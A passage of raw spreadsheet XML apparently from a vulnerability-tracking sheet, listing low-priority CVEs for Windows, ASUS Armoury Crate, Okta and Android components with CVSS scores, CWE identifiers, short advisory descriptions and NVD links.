t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1219" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1219" s="5" t="inlineStr" /><c r="H1219" s="5" t="n"><v>0.008</v></c><c r="I1219" s="5" t="inlineStr" /><c r="J1219" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1219" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1219" s="5" t="inlineStr" /><c r="M1219" s="5" t="inlineStr" /><c r="N1219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1219" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1219" s="5" t="inlineStr" /><c r="R1219" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1219" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Network File System allows an authorized attacker to deny service over a network.</t></is></c><c r="T1219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69372</t></is></c></row><row r="1220"><c r="A1220" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1220" s="5" t="inlineStr"><is><t>CVE-2026-69393</t></is></c><c r="D1220" s="5" t="n"><v>5.7</v></c><c r="E1220" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1220" s="5" t="inlineStr" /><c r="H1220" s="5" t="n"><v>0.008</v></c><c r="I1220" s="5" t="inlineStr" /><c r="J1220" s="5" t="inlineStr" /><c r="K1220" s="5" t="inlineStr" /><c r="L1220" s="5" t="inlineStr" /><c r="M1220" s="5" t="inlineStr" /><c r="N1220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1220" s="5" t="inlineStr" /><c r="R1220" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1220" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69393</t></is></c></row><row r="1221"><c r="A1221" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1221" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1221" s="5" t="inlineStr"><is><t>CVE-2026-69405</t></is></c><c r="D1221" s="5" t="n"><v>5.7</v></c><c r="E1221" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1221" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1221" s="5" t="inlineStr" /><c r="H1221" s="5" t="n"><v>0.006</v></c><c r="I1221" s="5" t="inlineStr" /><c r="J1221" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1221" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1221" s="5" t="inlineStr" /><c r="M1221" s="5" t="inlineStr" /><c r="N1221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1221" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1221" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1221" s="5" t="inlineStr" /><c r="R1221" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1221" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t></is></c></row><row r="1222"><c r="A1222" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1222" s="5" t="inlineStr"><is><t>CVE-2026-69416</t></is></c><c r="D1222" s="5" t="n"><v>5.7</v></c><c r="E1222" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1222" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1222" s="5" t="inlineStr" /><c r="H1222" s="5" t="n"><v>0.006</v></c><c r="I1222" s="5" t="inlineStr" /><c r="J1222" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1222" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1222" s="5" t="inlineStr" /><c r="M1222" s="5" t="inlineStr" /><c r="N1222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1222" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1222" s="5" t="inlineStr" /><c r="R1222" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1222" s="5" t="inlineStr"><is><t>Buffer over-read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69416</t></is></c></row><row r="1223"><c r="A1223" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1223" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1223" s="5" t="inlineStr"><is><t>CVE-2026-69507</t></is></c><c r="D1223" s="5" t="n"><v>5.7</v></c><c r="E1223" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1223" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1223" s="5" t="inlineStr" /><c r="H1223" s="5" t="n"><v>0.008</v></c><c r="I1223" s="5" t="inlineStr" /><c r="J1223" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1223" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1223" s="5" t="inlineStr" /><c r="M1223" s="5" t="inlineStr" /><c r="N1223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1223" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1223" s="5" t="inlineStr" /><c r="R1223" s="5" t="inlineStr"><is><t>CWE-538</t></is></c><c r="S1223" s="5" t="inlineStr"><is><t>Insertion of sensitive information into externally-accessible file or directory in Microsoft Windows Search Component allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69507</t></is></c></row><row r="1224"><c r="A1224" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1224" s="5" t="inlineStr"><is><t>CVE-2026-69552</t></is></c><c r="D1224" s="5" t="n"><v>5.7</v></c><c r="E1224" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1224" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1224" s="5" t="inlineStr" /><c r="H1224" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1224" s="5" t="inlineStr" /><c r="J1224" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K122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24" s="5" t="inlineStr" /><c r="M1224" s="5" t="inlineStr" /><c r="N1224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1224" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1224" s="5" t="inlineStr" /><c r="R1224" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1224" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Print Spooler Components allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69552</t></is></c></row><row r="1225"><c r="A1225" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1225" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1225" s="5" t="inlineStr"><is><t>CVE-2026-69569</t></is></c><c r="D1225" s="5" t="n"><v>5.7</v></c><c r="E1225" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1225" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1225" s="5" t="inlineStr" /><c r="H1225" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1225" s="5" t="inlineStr" /><c r="J1225" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K122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25" s="5" t="inlineStr" /><c r="M1225" s="5" t="inlineStr" /><c r="N1225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1225" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1225" s="5" t="inlineStr" /><c r="R1225" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1225" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Print Spooler Components allows an authorized attacker to deny service over a network.</t></is></c><c r="T1225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69569</t></is></c></row><row r="1226"><c r="A1226" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1226" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1226" s="5" t="inlineStr"><is><t>CVE-2026-69572</t></is></c><c r="D1226" s="5" t="n"><v>5.7</v></c><c r="E1226" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1226" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1226" s="5" t="inlineStr" /><c r="H1226" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1226" s="5" t="inlineStr" /><c r="J1226" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K122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26" s="5" t="inlineStr" /><c r="M1226" s="5" t="inlineStr" /><c r="N1226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1226" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1226" s="5" t="inlineStr" /><c r="R1226" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1226" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69572</t></is></c></row><row r="1227"><c r="A1227" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1227" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1227" s="5" t="inlineStr"><is><t>CVE-2026-69591</t></is></c><c r="D1227" s="5" t="n"><v>5.7</v></c><c r="E1227" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1227" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1227" s="5" t="inlineStr" /><c r="H1227" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1227" s="5" t="inlineStr" /><c r="J1227" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1227"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227" s="5" t="inlineStr" /><c r="M1227" s="5" t="inlineStr" /><c r="N1227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1227" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1227" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1227" s="5" t="inlineStr" /><c r="R1227" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1227" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t></is></c></row><row r="1228"><c r="A1228" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1228" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1228" s="5" t="inlineStr"><is><t>CVE-2026-69637</t></is></c><c r="D1228" s="5" t="n"><v>5.7</v></c><c r="E1228" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1228" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1228" s="5" t="inlineStr" /><c r="H1228" s="5" t="n"><v>0.006</v></c><c r="I1228" s="5" t="inlineStr" /><c r="J1228" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1228" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1228" s="5" t="inlineStr" /><c r="M1228" s="5" t="inlineStr" /><c r="N1228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1228" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1228" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1228" s="5" t="inlineStr" /><c r="R1228" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1228" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t></is></c></row><row r="1229"><c r="A1229" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1229" s="5" t="inlineStr"><is><t>CVE-2026-69679</t></is></c><c r="D1229" s="5" t="n"><v>5.7</v></c><c r="E1229" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1229" s="5" t="inlineStr" /><c r="H1229" s="5" t="n"><v>0.006</v></c><c r="I1229" s="5" t="inlineStr" /><c r="J1229" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1229" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1229" s="5" t="inlineStr" /><c r="M1229" s="5" t="inlineStr" /><c r="N1229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1229" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1229" s="5" t="inlineStr" /><c r="R1229" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1229" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t></is></c></row><row r="1230"><c r="A1230" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1230" s="5" t="inlineStr"><is><t>CVE-2026-69723</t></is></c><c r="D1230" s="5" t="n"><v>5.7</v></c><c r="E1230" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1230" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1230" s="5" t="inlineStr" /><c r="H1230" s="5" t="n"><v>0.01</v></c><c r="I1230" s="5" t="inlineStr" /><c r="J1230" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K123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30" s="5" t="inlineStr" /><c r="M1230" s="5" t="inlineStr" /><c r="N1230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1230" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1230" s="5" t="inlineStr" /><c r="R1230" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1230" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t></is></c></row><row r="1231"><c r="A1231" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1231" s="5" t="inlineStr"><is><t>CVE-2026-75808</t></is></c><c r="D1231" s="5" t="n"><v>5.7</v></c><c r="E1231" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1231" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1231" s="5" t="inlineStr" /><c r="H1231" s="5" t="n"><v>0.001</v></c><c r="I1231" s="5" t="inlineStr" /><c r="J1231" s="5" t="inlineStr" /><c r="K1231" s="5" t="inlineStr" /><c r="L1231" s="5" t="inlineStr" /><c r="M1231" s="5" t="inlineStr" /><c r="N1231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1231" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1231" s="5" t="inlineStr" /><c r="R1231" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1231" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling in ASUS Armoury Crate allows a local user to cause a denial-of-service condition through system memory exhaustion by bypassing driver authentication and allocating an unrestricted amount of memory.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75808</t></is></c></row><row r="1232"><c r="A1232" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1232" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1232" s="5" t="inlineStr"><is><t>CVE-2026-75810</t></is></c><c r="D1232" s="5" t="n"><v>5.7</v></c><c r="E1232" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1232" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1232" s="5" t="inlineStr" /><c r="H1232" s="5" t="n"><v>0.001</v></c><c r="I1232" s="5" t="inlineStr" /><c r="J1232" s="5" t="inlineStr" /><c r="K1232" s="5" t="inlineStr" /><c r="L1232" s="5" t="inlineStr" /><c r="M1232" s="5" t="inlineStr" /><c r="N1232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1232" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1232" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1232" s="5" t="inlineStr" /><c r="R1232" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S1232" s="5" t="inlineStr"><is><t>Exposed Dangerous Method or Function in ASUS Armoury Crate allow a local user to cause a brief system stall by bypassing driver authentication and sending requests to trigger system management interrupts (SMIs). Repeatedly triggering SMI may lead to a denial-of-service (DoS) condition.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75810</t></is></c></row><row r="1233"><c r="A1233" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1233" s="5" t="inlineStr"><is><t>CVE-2026-78629</t></is></c><c r="D1233" s="5" t="n"><v>5.6</v></c><c r="E1233" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1233" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1233" s="5" t="inlineStr" /><c r="H1233" s="5" t="n"><v>0.001</v></c><c r="I1233" s="5" t="inlineStr" /><c r="J1233" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1233" s="5" t="inlineStr" /><c r="L1233" s="5" t="inlineStr" /><c r="M1233" s="5" t="inlineStr" /><c r="N1233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1233" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1233" s="5" t="inlineStr" /><c r="R1233" s="5" t="inlineStr"><is><t>CWE-303</t></is></c><c r="S1233" s="5" t="inlineStr"><is><t>The Okta Hyperdrive agent plugin returns a success response without a signed SAML assertion when the organization's policy requires no MFA for a given user. The response contains only a bare boolean validation indicator with no cryptographic artifact, resulting in an unverifiable authentication verdict being delivered to the relying application.</t></is></c><c r="T1233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t></is></c></row><row r="1234"><c r="A1234" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1234" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1234" s="5" t="inlineStr"><is><t>CVE-2026-28584</t></is></c><c r="D1234" s="5" t="n"><v>5.5</v></c><c r="E1234" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1234" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1234" s="5" t="inlineStr" /><c r="H1234" s="5" t="n"><v>0.001</v></c><c r="I1234" s="5" t="inlineStr" /><c r="J1234" s="5" t="inlineStr" /><c r="K1234" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1234" s="5" t="inlineStr" /><c r="M1234" s="5" t="inlineStr" /><c r="N1234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1234" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1234" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1234" s="5" t="inlineStr" /><c r="R1234" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1234" s="5" t="inlineStr"><is><t>In createSessionInternal of PackageInstallerService.java, there is a possible way to permanently DoS the device due to a logic error in the code. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28584</t></is></c></row><row r="1235"><c r="A1235" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1235" s="5" t="inlineStr"><is><t>CVE-2026-28596</t></is></c><c r="D1235" s="5" t="n"><v>5.5</v></c><c r="E1235" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1235" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1235" s="5" t="inlineStr" /><c r="H1235" s="5" t="n"><v>0.001</v></c><c r="I1235" s="5" t="inlineStr" /><c r="J1235" s="5" t="inlineStr" /><c r="K1235" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1235" s="5" t="inlineStr" /><c r="M1235" s="5" t="inlineStr" /><c r="N1235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1235" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1235" s="5" t="inlineStr" /><c r="R1235" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1235" s="5" t="inlineStr"><is><t>In parseInterventionFromXml of GameManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28596</t></is></c></row><row r="1236"><c r="A1236" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1236" s="5" t="inlineStr"><is><t>CVE-2026-28617</t></is></c><c r="D1236" s="5" t="n"><v>5.5</v></c><c r="E1236" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1236" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1236" s="5" t="inlineStr" /><c r="H1236" s="5" t="n"><v>0.001</v></c><c r="I1236" s="5" t="inlineStr" /><c r="J1236" s="5" t="inlineStr" /><c r="K1236" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1236" s="5" t="inlineStr" /><c r="M1236" s="5" t="inlineStr" /><c r="N1236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1236" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1236" s="5" t="inlineStr" /><c r="R1236" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1236" s="5" t="inlineStr"><is><t>In add of WifiNetworkSuggestionsManager.java, there is a possible persistent DOS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28617</t></is></c></row><row r="1237"><c r="A1237" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1237" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1237" s="5" t="inlineStr"><is><t>CVE-2026-28633</t></is></c><c r="D1237" s="5" t="n"><v>5.5</v></c><c r="E1237" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1237" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1237" s="5" t="inlineStr" /><c r="H1237" s="5" t="n"><v>0.001</v></c><c r="I1237" s="5" t="inlineStr" /><c r="J1237" s="5" t="inlineStr" /><c r="K1237" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1237" s="5" t="inlineStr" /><c r="M1237" s="5" t="inlineStr" /><c r="N1237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1237" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1237" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1237" s="5" t="inlineStr" /><c r="R1237" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1237" s="5" t="inlineStr"><is><t>In initForUserNoTracing of VoiceInteractionManagerService.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28633</t></is></c></row><row r="1238"><c r="A1238" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1238" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1238" s="5" t="inlineStr"><is><t>CVE-2026-49883</t></is></c><c r="D1238" s="5" t="n"><v>5.5</v></c><c r="E1238" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1238" s="5" t="inlineStr" /><c r="H1238" s="5" t="n"><v>0.001</v></c><c r="I1238" s="5" t="inlineStr" /><c r="J1238" s="5" t="inlineStr" /><c r="K1238" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1238" s="5" t="inlineStr" /><c r="M1238" s="5" t="inlineStr" /><c r="N1238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1238" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1238" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1238" s="5" t="inlineStr" /><c r="R1238" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S1238" s="5" t="inlineStr"><is><t>In checkReadPermission of PermissionsManager.java, there is a possible way to monitor sensitive device state data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49883</t></is></c></row><row r="1239"><c r="A1239" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1239" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1239" s="5" t="inlineStr"><is><t>CVE-2026-54611</t></is></c><c r="D1239" s="5" t="n"><v>5.5</v></c><c r="E1239" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1239" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1239" s="5" t="inlineStr" /><c r="H1239" s="5" t="n"><v>0.005</v></c><c r="I1239" s="5" t="inlineStr" /><c r="J1239" s="5" 